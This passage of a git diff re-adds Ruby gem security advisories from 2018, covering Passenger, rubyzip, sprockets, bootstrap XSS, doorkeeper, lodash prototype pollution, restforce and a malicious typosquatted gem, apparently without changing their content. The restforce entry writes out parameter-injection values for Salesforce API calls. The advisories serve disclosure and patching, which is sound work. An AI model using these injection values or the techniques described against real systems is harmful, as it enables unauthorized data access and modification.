+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2018-12028
+  ghsa: jjhj-8gx7-x836
+  url: https://blog.phusion.nl/passenger-5-3-2
+  title: Incorrect Access Control in Phusion Passenger
+  date: 2018-06-12
+  description: |
+    An Incorrect Access Control vulnerability in SpawningKit in Phusion Passenger
+    5.3.x before 5.3.2 allows a Passenger-managed malicious application, upon spawning
+    a child process, to report an arbitrary different PID back to Passenger's process
+    manager. If the malicious application then generates an error, it would cause Passenger's
+    process manager to kill said reported arbitrary PID.
+  cvss_v2: 6.8
+  cvss_v3: 7.8
+  unaffected_versions:
+  - "< 5.3.0"
+  patched_versions:
+  - ">= 5.3.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12028
+    - https://blog.phusion.nl/passenger-5-3-2
+    - https://security.gentoo.org/glsa/201807-02
+    - https://github.com/advisories/GHSA-jjhj-8gx7-x836
+---
diff --git a/advisories/_posts/2018-06-12-CVE-2018-12029.md b/advisories/_posts/2018-06-12-CVE-2018-12029.md
index 7d9a3223..4823e587 100644
--- a/advisories/_posts/2018-06-12-CVE-2018-12029.md
+++ b/advisories/_posts/2018-06-12-CVE-2018-12029.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2018-12029 (passenger): CHMOD race vulnerability'
-comments: false
-categories:
-- passenger
-advisory:
-  gem: passenger
-  cve: 2018-12029
-  ghsa: jjcj-fgfm-9g9r
-  url: https://blog.phusion.nl/2018/06/12/passenger-5-3-2-various-security-fixes/
-  title: CHMOD race vulnerability
-  date: 2018-06-12
-  description: |
-    The file system access race condition allows for local privilege escalation
-    and affects the Nginx module for Passenger versions 5.3.1, all the way back
-    to 3.0.0 (the chown command entered the code in 2010).
-
-    The vulnerability was exploitable only when running a non-standard
-    `passenger_instance_registry_dir`, via a race condition where after a file
-    was created, there was a window in which it could be replaced with a symlink
-    before it was chowned via the path and not the file descriptor.
-
-    If the symlink target was to a file which would be executed by root such as
-    root's crontab file, then privilege escalation was possible.
-  cvss_v2: 4.4
-  cvss_v3: 7.0
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - ">= 5.3.2"
----
+---
+layout: advisory
+title: 'CVE-2018-12029 (passenger): CHMOD race vulnerability'
+comments: false
+categories:
+- passenger
+advisory:
+  gem: passenger
+  cve: 2018-12029
+  ghsa: jjcj-fgfm-9g9r
+  url: https://blog.phusion.nl/2018/06/12/passenger-5-3-2-various-security-fixes/
+  title: CHMOD race vulnerability
+  date: 2018-06-12
+  description: |
+    The file system access race condition allows for local privilege escalation
+    and affects the Nginx module for Passenger versions 5.3.1, all the way back
+    to 3.0.0 (the chown command entered the code in 2010).
+
+    The vulnerability was exploitable only when running a non-standard
+    `passenger_instance_registry_dir`, via a race condition where after a file
+    was created, there was a window in which it could be replaced with a symlink
+    before it was chowned via the path and not the file descriptor.
+
+    If the symlink target was to a file which would be executed by root such as
+    root's crontab file, then privilege escalation was possible.
+  cvss_v2: 4.4
+  cvss_v3: 7.0
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - ">= 5.3.2"
+---
diff --git a/advisories/_posts/2018-06-14-CVE-2018-1000544.md b/advisories/_posts/2018-06-14-CVE-2018-1000544.md
index 1a71543a..4835e833 100644
--- a/advisories/_posts/2018-06-14-CVE-2018-1000544.md
+++ b/advisories/_posts/2018-06-14-CVE-2018-1000544.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2018-1000544 (rubyzip): Directory Traversal in rubyzip'
-comments: false
-categories:
-- rubyzip
-advisory:
-  gem: rubyzip
-  cve: 2018-1000544
-  ghsa: vqcq-mrmw-mcmg
-  url: https://github.com/rubyzip/rubyzip/issues/369
-  title: Directory Traversal in rubyzip
-  date: 2018-06-14
-  description: |
-    rubyzip version 1.2.1 and earlier contains a Directory Traversal vulnerability
-    in Zip::File component that can result in write arbitrary files to the filesystem.
-    If a site allows uploading of .zip files, an attacker can upload a malicious file
-    which contains symlinks or files with absolute pathnames "../" to write arbitrary
-    files to the filesystem.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.2.2"
-  related:
-    cve:
-    - 2017-5946
-    url:
-    - https://security-tracker.debian.org/tracker/CVE-2018-1000544
----
+---
+layout: advisory
+title: 'CVE-2018-1000544 (rubyzip): Directory Traversal in rubyzip'
+comments: false
+categories:
+- rubyzip
+advisory:
+  gem: rubyzip
+  cve: 2018-1000544
+  ghsa: vqcq-mrmw-mcmg
+  url: https://github.com/rubyzip/rubyzip/issues/369
+  title: Directory Traversal in rubyzip
+  date: 2018-06-14
+  description: |
+    rubyzip version 1.2.1 and earlier contains a Directory Traversal vulnerability
+    in Zip::File component that can result in write arbitrary files to the filesystem.
+    If a site allows uploading of .zip files, an attacker can upload a malicious file
+    which contains symlinks or files with absolute pathnames "../" to write arbitrary
+    files to the filesystem.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.2.2"
+  related:
+    cve:
+    - 2017-5946
+    url:
+    - https://security-tracker.debian.org/tracker/CVE-2018-1000544
+---
diff --git a/advisories/_posts/2018-06-19-CVE-2018-3760.md b/advisories/_posts/2018-06-19-CVE-2018-3760.md
index 107ddb51..034acee0 100644
--- a/advisories/_posts/2018-06-19-CVE-2018-3760.md
+++ b/advisories/_posts/2018-06-19-CVE-2018-3760.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2018-3760 (sprockets): Path Traversal in Sprockets'
-comments: false
-categories:
-- sprockets
-advisory:
-  gem: sprockets
-  cve: 2018-3760
-  ghsa: pr3h-jjhj-573x
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/2S9Pwz2i16k
-  title: Path Traversal in Sprockets
-  date: 2018-06-19
-  description: |
-    Specially crafted requests can be used to access files that exist on
-    the filesystem that is outside an application's root directory, when the
-    Sprockets server is used in production.
-
-    All users running an affected release should either upgrade or use one of the work arounds immediately.
-
-    Workaround:
-    In Rails applications, work around this issue, set `config.assets.compile = false` and
-    `config.public_file_server.enabled = true` in an initializer and precompile the assets.
-
-     This work around will not be possible in all hosting environments and upgrading is advised.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.12.5, < 3.0.0"
-  - ">= 3.7.2, < 4.0.0"
-  - ">= 4.0.0.beta8"
----
+---
+layout: advisory
+title: 'CVE-2018-3760 (sprockets): Path Traversal in Sprockets'
+comments: false
+categories:
+- sprockets
+advisory:
+  gem: sprockets
+  cve: 2018-3760
+  ghsa: pr3h-jjhj-573x
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/2S9Pwz2i16k
+  title: Path Traversal in Sprockets
+  date: 2018-06-19
+  description: |
+    Specially crafted requests can be used to access files that exist on
+    the filesystem that is outside an application's root directory, when the
+    Sprockets server is used in production.
+
+    All users running an affected release should either upgrade or use one of the work arounds immediately.
+
+    Workaround:
+    In Rails applications, work around this issue, set `config.assets.compile = false` and
+    `config.public_file_server.enabled = true` in an initializer and precompile the assets.
+
+     This work around will not be possible in all hosting environments and upgrading is advised.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.12.5, < 3.0.0"
+  - ">= 3.7.2, < 4.0.0"
+  - ">= 4.0.0.beta8"
+---
diff --git a/advisories/_posts/2018-06-22-CVE-2018-1000201.md b/advisories/_posts/2018-06-22-CVE-2018-1000201.md
index 49073c63..f5062f5b 100644
--- a/advisories/_posts/2018-06-22-CVE-2018-1000201.md
+++ b/advisories/_posts/2018-06-22-CVE-2018-1000201.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2018-1000201 (ffi): ruby-ffi DDL loading issue on Windows OS'
-comments: false
-categories:
-- ffi
-advisory:
-  gem: ffi
-  cve: 2018-1000201
-  ghsa: 2gw2-8q9w-cw8p
-  url: https://github.com/ffi/ffi/releases/tag/1.9.24
-  title: ruby-ffi DDL loading issue on Windows OS
-  date: 2018-06-22
-  description: |
-    ruby-ffi version 1.9.23 and earlier has a DLL loading issue which can be
-    hijacked on Windows OS, when a Symbol is used as DLL name instead of a String
-    This vulnerability appears to have been fixed in v1.9.24 and later.
-  cvss_v2: 6.8
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 1.9.24"
-  related:
-    url:
-    - https://github.com/ffi/ffi/commit/09e0c6076466b4383da7fa4e13f714311109945a
-    - https://github.com/ffi/ffi/commit/e0fe486df0e117ed67b0282b6ada04b7214ca05c
----
+---
+layout: advisory
+title: 'CVE-2018-1000201 (ffi): ruby-ffi DDL loading issue on Windows OS'
+comments: false
+categories:
+- ffi
+advisory:
+  gem: ffi
+  cve: 2018-1000201
+  ghsa: 2gw2-8q9w-cw8p
+  url: https://github.com/ffi/ffi/releases/tag/1.9.24
+  title: ruby-ffi DDL loading issue on Windows OS
+  date: 2018-06-22
+  description: |
+    ruby-ffi version 1.9.23 and earlier has a DLL loading issue which can be
+    hijacked on Windows OS, when a Symbol is used as DLL name instead of a String
+    This vulnerability appears to have been fixed in v1.9.24 and later.
+  cvss_v2: 6.8
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 1.9.24"
+  related:
+    url:
+    - https://github.com/ffi/ffi/commit/09e0c6076466b4383da7fa4e13f714311109945a
+    - https://github.com/ffi/ffi/commit/e0fe486df0e117ed67b0282b6ada04b7214ca05c
+---
diff --git a/advisories/_posts/2018-07-03-CVE-2018-14040.md b/advisories/_posts/2018-07-03-CVE-2018-14040.md
index 8b21fe0a..0847941d 100644
--- a/advisories/_posts/2018-07-03-CVE-2018-14040.md
+++ b/advisories/_posts/2018-07-03-CVE-2018-14040.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2018-14040 (bootstrap): XSS vulnerabilities via data-parent, data-target,
-  data-container in bootstrap'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2018-14040
-  ghsa: 3wqf-4x89-9g79
-  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
-  title: XSS vulnerabilities via data-parent, data-target, data-container in bootstrap
-  date: 2018-07-03
-  description: |
-    In Bootstrap before 4.1.2, XSS is possible in collapse data-parent
-    attribute (CVE-2018-14040), data-target property of scrollspy
-    (CVE-2018-14041), data-container property of tooltip (CVE-2018-14042)
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.1.2"
-  related:
-    cve:
-    - 2018-14041
-    - 2018-14042
-    url:
-    - https://nvd.nist.gov/vuln/detail/cve-2018-14040
-    - https://github.com/twbs/bootstrap/issues/26423
-    - https://github.com/twbs/bootstrap/pull/26630
-    - https://github.com/advisories/GHSA-3wqf-4x89-9g79
----
+---
+layout: advisory
+title: 'CVE-2018-14040 (bootstrap): XSS vulnerabilities via data-parent, data-target,
+  data-container in bootstrap'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2018-14040
+  ghsa: 3wqf-4x89-9g79
+  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
+  title: XSS vulnerabilities via data-parent, data-target, data-container in bootstrap
+  date: 2018-07-03
+  description: |
+    In Bootstrap before 4.1.2, XSS is possible in collapse data-parent
+    attribute (CVE-2018-14040), data-target property of scrollspy
+    (CVE-2018-14041), data-container property of tooltip (CVE-2018-14042)
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.1.2"
+  related:
+    cve:
+    - 2018-14041
+    - 2018-14042
+    url:
+    - https://nvd.nist.gov/vuln/detail/cve-2018-14040
+    - https://github.com/twbs/bootstrap/issues/26423
+    - https://github.com/twbs/bootstrap/pull/26630
+    - https://github.com/advisories/GHSA-3wqf-4x89-9g79
+---
diff --git a/advisories/_posts/2018-07-11-CVE-2018-1000211.md b/advisories/_posts/2018-07-11-CVE-2018-1000211.md
index a8303dcd..06fbaa27 100644
--- a/advisories/_posts/2018-07-11-CVE-2018-1000211.md
+++ b/advisories/_posts/2018-07-11-CVE-2018-1000211.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2018-1000211 (doorkeeper): Doorkeeper gem does not revoke token for public
-  clients'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  cve: 2018-1000211
-  ghsa: 694m-jhr9-pf77
-  url: https://blog.justinbull.ca/cve-2018-1000211-public-apps-cant-revoke-tokens-in-doorkeeper/
-  title: Doorkeeper gem does not revoke token for public clients
-  date: 2018-07-11
-  description: |
-    Any OAuth application that uses public/non-confidential authentication when
-    interacting with Doorkeeper is unable to revoke its tokens when calling the
-    revocation endpoint.
-
-    A bug in the token revocation API would cause it to attempt to authenticate
-    the public OAuth client as if it was a confidential app. Because of this, the
-    token is never revoked.
-
-    The impact of this is the access or refresh token is not revoked, leaking
-    access to protected resources for the remainder of that token's lifetime.
-
-    If Doorkeeper is used to facilitate public OAuth apps and leverage token
-    revocation functionality, upgrade to the patched versions immediately.
-
-    Credit to Roberto Ostinelli for discovery, Justin Bull for the fixes.
-
-    DWF has assigned CVE-2018-1000211.
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.2.0"
-  patched_versions:
-  - ">= 4.4.0"
-  - ">= 5.0.0.rc2"
-  related:
-    url:
-    - https://github.com/doorkeeper-gem/doorkeeper/issues/891
-    - https://github.com/doorkeeper-gem/doorkeeper/pull/1119
-    - https://github.com/doorkeeper-gem/doorkeeper/pull/1120
----
+---
+layout: advisory
+title: 'CVE-2018-1000211 (doorkeeper): Doorkeeper gem does not revoke token for public
+  clients'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  cve: 2018-1000211
+  ghsa: 694m-jhr9-pf77
+  url: https://blog.justinbull.ca/cve-2018-1000211-public-apps-cant-revoke-tokens-in-doorkeeper/
+  title: Doorkeeper gem does not revoke token for public clients
+  date: 2018-07-11
+  description: |
+    Any OAuth application that uses public/non-confidential authentication when
+    interacting with Doorkeeper is unable to revoke its tokens when calling the
+    revocation endpoint.
+
+    A bug in the token revocation API would cause it to attempt to authenticate
+    the public OAuth client as if it was a confidential app. Because of this, the
+    token is never revoked.
+
+    The impact of this is the access or refresh token is not revoked, leaking
+    access to protected resources for the remainder of that token's lifetime.
+
+    If Doorkeeper is used to facilitate public OAuth apps and leverage token
+    revocation functionality, upgrade to the patched versions immediately.
+
+    Credit to Roberto Ostinelli for discovery, Justin Bull for the fixes.
+
+    DWF has assigned CVE-2018-1000211.
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.2.0"
+  patched_versions:
+  - ">= 4.4.0"
+  - ">= 5.0.0.rc2"
+  related:
+    url:
+    - https://github.com/doorkeeper-gem/doorkeeper/issues/891
+    - https://github.com/doorkeeper-gem/doorkeeper/pull/1119
+    - https://github.com/doorkeeper-gem/doorkeeper/pull/1120
+---
diff --git a/advisories/_posts/2018-07-26-CVE-2018-3721.md b/advisories/_posts/2018-07-26-CVE-2018-3721.md
index f039a799..53de670e 100644
--- a/advisories/_posts/2018-07-26-CVE-2018-3721.md
+++ b/advisories/_posts/2018-07-26-CVE-2018-3721.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2018-3721 (lodash-rails): Prototype Pollution in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2018-3721
-  ghsa: fvqr-27wr-82fm
-  url: https://github.com/advisories/GHSA-fvqr-27wr-82fm
-  title: Prototype Pollution in lodash
-  date: 2018-07-26
-  description: |
-    Versions of `lodash` before 4.17.5 are vulnerable to
-    prototype pollution.
-
-    The vulnerable functions are 'defaultsDeep', 'merge', and
-    'mergeWith' which allow a malicious user to modify the
-    prototype of `Object` via `__proto__` causing the addition
-    or modification of an existing property that will exist
-    on all objects.
-
-    ## Recommendation
-
-    Update to version 4.17.5 or later."
-  cvss_v2: 4.0
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 4.17.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-3721
-    - https://hackerone.com/reports/310443
-    - https://www.npmjs.com/advisories/577
-    - https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a
-    - https://security.netapp.com/advisory/ntap-20190919-0004
-    - https://github.com/advisories/GHSA-fvqr-27wr-82fm
----
+---
+layout: advisory
+title: 'CVE-2018-3721 (lodash-rails): Prototype Pollution in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2018-3721
+  ghsa: fvqr-27wr-82fm
+  url: https://github.com/advisories/GHSA-fvqr-27wr-82fm
+  title: Prototype Pollution in lodash
+  date: 2018-07-26
+  description: |
+    Versions of `lodash` before 4.17.5 are vulnerable to
+    prototype pollution.
+
+    The vulnerable functions are 'defaultsDeep', 'merge', and
+    'mergeWith' which allow a malicious user to modify the
+    prototype of `Object` via `__proto__` causing the addition
+    or modification of an existing property that will exist
+    on all objects.
+
+    ## Recommendation
+
+    Update to version 4.17.5 or later."
+  cvss_v2: 4.0
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 4.17.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-3721
+    - https://hackerone.com/reports/310443
+    - https://www.npmjs.com/advisories/577
+    - https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a
+    - https://security.netapp.com/advisory/ntap-20190919-0004
+    - https://github.com/advisories/GHSA-fvqr-27wr-82fm
+---
diff --git a/advisories/_posts/2018-07-27-CVE-2018-3777.md b/advisories/_posts/2018-07-27-CVE-2018-3777.md
index faa9e084..b8fd8ff6 100644
--- a/advisories/_posts/2018-07-27-CVE-2018-3777.md
+++ b/advisories/_posts/2018-07-27-CVE-2018-3777.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-3777 (restforce): Insufficient URI encoding in restforce'
-comments: false
-categories:
-- restforce
-advisory:
-  gem: restforce
-  cve: 2018-3777
-  ghsa: 534w-937m-v7x3
-  url: https://github.com/restforce/restforce/pull/392
-  title: Insufficient URI encoding in restforce
-  date: 2018-07-27
-  description: |
-    A flaw in how restforce constructs URL's may allow an attacker to inject
-    additional parameters into Salesforce API requests.
-
-    Impact
-    ------
-    This flaw is only exploitable in applications that pass user input directly
-    to restforce's select, find, describe, update, upsert, and destroy methods.
-    Vulnerable code might look like:
-
-    ```ruby
-    client.select('SomeSalesForceObject', params[:some-id],
-       ...)
-    ```
-
-    In such an application, attackers could pass `0016000000MRatd/describe`
-    as a request parameter, causing the server to make a request to a different
-    endpoint than the server is designed to handle. Since the Salesforce REST
-    API supports overriding HTTP methods via a request parameter, an attacker
-    could also cause the client's `select()` method to modify data, by passing
-    `0016000000MRatd/?_HttpMethod=PATCH&other-query-params=...`.
-
-    Workarounds
-    ------
-    If possible, applications should track salesforce IDs internally, rather than
-    passing user-supplied IDs to salesforce. Such practice mitigates this
-    vulnerability, and in general is desirable for ensuring strong access control.
-  cvss_v3: 9.8
-  patched_versions:
-  - "~> 2.5.4"
-  - ">= 3.0.0"
----
+---
+layout: advisory
+title: 'CVE-2018-3777 (restforce): Insufficient URI encoding in restforce'
+comments: false
+categories:
+- restforce
+advisory:
+  gem: restforce
+  cve: 2018-3777
+  ghsa: 534w-937m-v7x3
+  url: https://github.com/restforce/restforce/pull/392
+  title: Insufficient URI encoding in restforce
+  date: 2018-07-27
+  description: |
+    A flaw in how restforce constructs URL's may allow an attacker to inject
+    additional parameters into Salesforce API requests.
+
+    Impact
+    ------
+    This flaw is only exploitable in applications that pass user input directly
+    to restforce's select, find, describe, update, upsert, and destroy methods.
+    Vulnerable code might look like:
+
+    ```ruby
+    client.select('SomeSalesForceObject', params[:some-id],
+       ...)
+    ```
+
+    In such an application, attackers could pass `0016000000MRatd/describe`
+    as a request parameter, causing the server to make a request to a different
+    endpoint than the server is designed to handle. Since the Salesforce REST
+    API supports overriding HTTP methods via a request parameter, an attacker
+    could also cause the client's `select()` method to modify data, by passing
+    `0016000000MRatd/?_HttpMethod=PATCH&other-query-params=...`.
+
+    Workarounds
+    ------
+    If possible, applications should track salesforce IDs internally, rather than
+    passing user-supplied IDs to salesforce. Such practice mitigates this
+    vulnerability, and in general is desirable for ensuring strong access control.
+  cvss_v3: 9.8
+  patched_versions:
+  - "~> 2.5.4"
+  - ">= 3.0.0"
+---
diff --git a/advisories/_posts/2018-08-09-CVE-2018-3779.md b/advisories/_posts/2018-08-09-CVE-2018-3779.md
index b71dbc05..09ba9a30 100644
--- a/advisories/_posts/2018-08-09-CVE-2018-3779.md
+++ b/advisories/_posts/2018-08-09-CVE-2018-3779.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2018-3779 (active-support): Malicious ruby gem - active-support'
-comments: false
-categories:
-- active-support
-advisory:
-  gem: active-support
-  cve: 2018-3779
-  ghsa: 2j55-pcw5-x4h2
-  url: https://hackerone.com/reports/392311
-  title: Malicious ruby gem - active-support
-  date: 2018-08-09
-  description: |
-    The gem duplicates official `activesupport` (no hyphen) code, but adds a
-    compiled extension. The extension attempts to resolve a base64 encoded
-    domain, downloads a payload, and executes.
-
-    Replace this gem with the official `activesupport` gem.
-  related:
-    url:
-    - https://github.com/rubygems/rubygems.org/pull/1762
----
+---
+layout: advisory
+title: 'CVE-2018-3779 (active-support): Malicious ruby gem - active-support'
+comments: false
+categories:
+- active-support
+advisory:
+  gem: active-support
+  cve: 2018-3779
+  ghsa: 2j55-pcw5-x4h2
+  url: https://hackerone.com/reports/392311
+  title: Malicious ruby gem - active-support
+  date: 2018-08-09
+  description: |
+    The gem duplicates official `activesupport` (no hyphen) code, but adds a
+    compiled extension. The extension attempts to resolve a base64 encoded
+    domain, downloads a payload, and executes.
+
+    Replace this gem with the official `activesupport` gem.
+  related:
+    url:
+    - https://github.com/rubygems/rubygems.org/pull/1762
+---
diff --git a/advisories/_posts/2018-09-13-CVE-2018-14041.md b/advisories/_posts/2018-09-13-CVE-2018-14041.md
index 3672be6d..12a4d491 100644
--- a/advisories/_posts/2018-09-13-CVE-2018-14041.md
+++ b/advisories/_posts/2018-09-13-CVE-2018-14041.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2018-14041 (bootstrap): Bootstrap vulnerable to Cross-Site Scripting (XSS)'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2018-14041
-  ghsa: pj7m-g53m-7638
-  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
-  title: Bootstrap vulnerable to Cross-Site Scripting (XSS)
-  date: 2018-09-13
-  description: |
-    In Bootstrap before 4.1.2, XSS is possible in the collapse
-    data-parent attribute.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-14041
-    - https://github.com/twbs/bootstrap/issues/26625
-    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
-    - https://github.com/twbs/bootstrap/issues/26423
-    - https://github.com/twbs/bootstrap/issues/26628
-    - https://github.com/twbs/bootstrap/pull/26630
-    - https://github.com/twbs/bootstrap/commit/149096016f70fd815540d62c0989fd99cdc809e0
-    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/collapse.js#L140
-    - https://lists.debian.org/debian-lts-announce/2018/08/msg00027.html
-    - https://seclists.org/bugtraq/2019/May/18
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - https://www.tenable.com/security/tns-2021-14
-    - https://github.com/advisories/GHSA-pj7m-g53m-7638
----
+---
+layout: advisory
+title: 'CVE-2018-14041 (bootstrap): Bootstrap vulnerable to Cross-Site Scripting (XSS)'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2018-14041
+  ghsa: pj7m-g53m-7638
+  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
+  title: Bootstrap vulnerable to Cross-Site Scripting (XSS)
+  date: 2018-09-13
+  description: |
+    In Bootstrap before 4.1.2, XSS is possible in the collapse
+    data-parent attribute.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14041
+    - https://github.com/twbs/bootstrap/issues/26625
+    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2
+    - https://github.com/twbs/bootstrap/issues/26423
+    - https://github.com/twbs/bootstrap/issues/26628
+    - https://github.com/twbs/bootstrap/pull/26630
+    - https://github.com/twbs/bootstrap/commit/149096016f70fd815540d62c0989fd99cdc809e0
+    - https://github.com/twbs/bootstrap/blob/v3.4.1/js/collapse.js#L140
+    - https://lists.debian.org/debian-lts-announce/2018/08/msg00027.html
+    - https://seclists.org/bugtraq/2019/May/18
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - https://www.tenable.com/security/tns-2021-14
+    - https://github.com/advisories/GHSA-pj7m-g53m-7638
+---
diff --git a/advisories/_posts/2018-09-13-CVE-2018-14042.md b/advisories/_posts/2018-09-13-CVE-2018-14042.md
index 63035f16..c328257f 100644
--- a/advisories/_posts/2018-09-13-CVE-2018-14042.md
+++ b/advisories/_posts/2018-09-13-CVE-2018-14042.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-14042 (bootstrap): Bootstrap Cross-site Scripting vulnerability'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2018-14042
-  ghsa: 7mvr-5x2g-wfc8
-  url: https://github.com/twbs/bootstrap/issues/26423
-  title: Bootstrap Cross-site Scripting vulnerability
-  date: 2018-09-13
-  description: |
-    In Bootstrap before 4.1.2, XSS is possible in the data-container property
-    of tooltip.  This is similar to CVE-2018-14041.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.1.2"
-  related:
-    cve:
-    - 2018-14041
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2018-14042
-    - https://github.com/twbs/bootstrap/issues/26423
-    - https://github.com/twbs/bootstrap/issues/26628
-    - https://github.com/twbs/bootstrap/pull/26630
-    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
-    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@
-    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
-    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@
-    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@
-    - https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@
-    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
-    - https://seclists.org/bugtraq/2019/May/18
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
-    - http://seclists.org/fulldisclosure/2019/May/10
-    - http://seclists.org/fulldisclosure/2019/May/11
-    - http://seclists.org/fulldisclosure/2019/May/13
-    - https://github.com/advisories/GHSA-7mvr-5x2g-wfc8
-    - https://github.com/twbs/bootstrap/issues/26428
-    - https://github.com/twbs/bootstrap/commit/2d90d369bbc2bd2647620246c55cec8c4705e3d0
-    - https://www.tenable.com/security/tns-2021-14
----
+---
+layout: advisory
+title: 'CVE-2018-14042 (bootstrap): Bootstrap Cross-site Scripting vulnerability'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2018-14042
+  ghsa: 7mvr-5x2g-wfc8
+  url: https://github.com/twbs/bootstrap/issues/26423
+  title: Bootstrap Cross-site Scripting vulnerability
+  date: 2018-09-13
+  description: |
+    In Bootstrap before 4.1.2, XSS is possible in the data-container property
+    of tooltip.  This is similar to CVE-2018-14041.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.1.2"
+  related:
+    cve:
+    - 2018-14041
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14042
+    - https://github.com/twbs/bootstrap/issues/26423
+    - https://github.com/twbs/bootstrap/issues/26628
+    - https://github.com/twbs/bootstrap/pull/26630
+    - https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
+    - https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@
+    - https://lists.apache.org/thread.html/52e0e6b5df827ee7f1e68f7cc3babe61af3b2160f5d74a85469b7b0e@
+    - https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@
+    - https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@
+    - https://lists.apache.org/thread.html/r3dc0cac8d856bca02bd6997355d7ff83027dcfc82f8646a29b89b714@
+    - https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@
+    - https://seclists.org/bugtraq/2019/May/18
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html
+    - http://seclists.org/fulldisclosure/2019/May/10
+    - http://seclists.org/fulldisclosure/2019/May/11
+    - http://seclists.org/fulldisclosure/2019/May/13
+    - https://github.com/advisories/GHSA-7mvr-5x2g-wfc8
+    - https://github.com/twbs/bootstrap/issues/26428
+    - https://github.com/twbs/bootstrap/commit/2d90d369bbc2bd2647620246c55cec8c4705e3d0
+    - https://www.tenable.com/security/tns-2021-14
+---
